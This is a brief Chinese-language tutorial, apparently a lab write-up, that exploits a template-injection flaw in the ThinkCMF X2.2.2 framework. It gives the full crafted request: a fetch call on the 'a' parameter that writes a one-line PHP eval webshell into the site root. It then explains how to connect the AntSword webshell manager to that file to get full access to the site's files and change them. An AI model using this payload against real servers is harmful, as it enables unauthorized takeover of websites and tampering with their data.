1.测试环境
创建ThinkCMF X2.2.2框架,下载antsword,下面是AntSword官网
https://github.com/AntSwordProject/antSword/releases
下载完成后进行安装,安装教程可百度查询
2.漏洞利用
在ThinkCMF X2.2.2框架中通过构造a参数的fetch方法,创建文件在文件写入一句话木马代码,再利用AntSword获取网站权限对文件进行修改
3.漏洞测试
利用ThinkCMF X2.2.2框架漏洞通过构造a参数的fetch方法,在网站根目录下创建一句话木马文件
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('12.php','<?php @eval($_POST[shell]); ?>')</php>
运行后是空白页面,没有任何显示。
进入AntSword在URL地址输入你创建一句话木马文件位置,连接密码是$_POST所传入的内容,完成后点击添加数据
成功后将生成如下数据,双击进去就能看见整个网站目录及文件,可在里面随意修改数据。